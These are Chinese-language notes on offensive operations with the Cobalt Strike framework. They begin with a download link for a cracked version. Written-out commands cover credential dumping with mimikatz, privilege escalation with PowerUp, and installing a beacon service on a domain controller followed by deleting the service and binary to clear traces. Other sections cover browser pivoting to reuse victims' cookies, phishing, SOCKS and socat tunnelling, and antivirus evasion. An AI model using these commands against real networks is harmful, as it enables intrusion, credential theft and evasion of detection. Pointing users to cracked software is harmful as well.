Cobalt Strike
COBAIT STRIKE 3.14破解版:
https://download.csdn.net/download/weixin_41082546/11604021
客户端攻击重定向设置
view —application 查看目标系统日志
attack—web-drive-by—site clone
在此之前需要先生成一段攻击代码
钓鱼邮件实施 的4个阶段
session传递
将cobait strike 的 session 传递给metasploit框架的兄弟
新建监听,主机和端口与metasploit 框架兄弟一致
spawn 将 session 传递给metasploit队友
浏览器转发
使用目标的身份进入网站,目前只支持IE浏览器
其实相当于我们直接使用目标应用在浏览网页,加入对方近期登陆过某些网站并且cookie信息还存在,我们无需密码就可以进入对方的博客、邮箱等。
设置浏览器代理
CS上可以看到事件日志信息
权限提升
cmd下输入 whoami /groups 查看用户所属系统等级信息
win vista 之后系统权限等级分为三个等级,高级(管理)、中级(普通)、低级(限制执行)
powerup 权限提升
shell whoami /groups 查看用户和组信息
我们尝试使用powertools 下面的 powerup 来提权
mimikatz lsadump::cache 获取lasas中的明文口令
mimikatz misc::memssp
cd C:\windows\sysnative
shell dir mimilas.log
shell mimilas.log
shell type mimilas.log
获取管理员用户凭证,当我们上面执行mimikatz misc::memssp 的时候它已经下载到本地了
枚举的命令和方法
内网横向扩展
powerview 是用 powershell 写的工具
net 模块 是通过windows 的网络管理API 函数来处理问题
shell dir \\DC\c$
返回拒绝访问,说明我们没有权限
我们用文件服务器来尝试同样的事情
shell dir \\FILESERVER\C$
如何找出域管理员
net localgroup \\DC
net group
注:任何域的管理员都是登录到域的不同机器上的本地管理员权限
黄金票据
shell C:\windows\sysnative\klist
shell whoami \user 查看sid
upload beacon.exe
shell copy beacon.exe C:\\windows\temp
shell sc \\dc create beacon binpath=C:\windows\temp\beacon.exe
shell sc \\dc start beacon.exe
清除痕迹
shell sc \\dc delete beacon.exe
shell del \\dc\C$\windows\temp\beacon.exe
socks 转发
使用CS全局代理进行探测
反向转发隧道
设置转发
钓鱼
当目标点击了邮件中的链接,我们将获得一个新的session
ssh通道
使用metasploit框架 代理链接和socks代理转发来通过“beacon”通道来传输数据。
ssh 中的 -D 参数可以搭建一个代理服务器来转发任何通过它的连接。
这里的1080 端口本质上是一个代理服务器,任何通过这个代理服务器的数据都会被转发到远程服务器上。
socat tcp4-listen:445,fork tcp4:192.168.88.158:445
通过使用本地socks代理服务器,所有传输的数据自动转入我们攻击的目标
免杀
查看SPF 记录
查看dmarc记录
使用artifact进行免杀处理
applet 渗透测试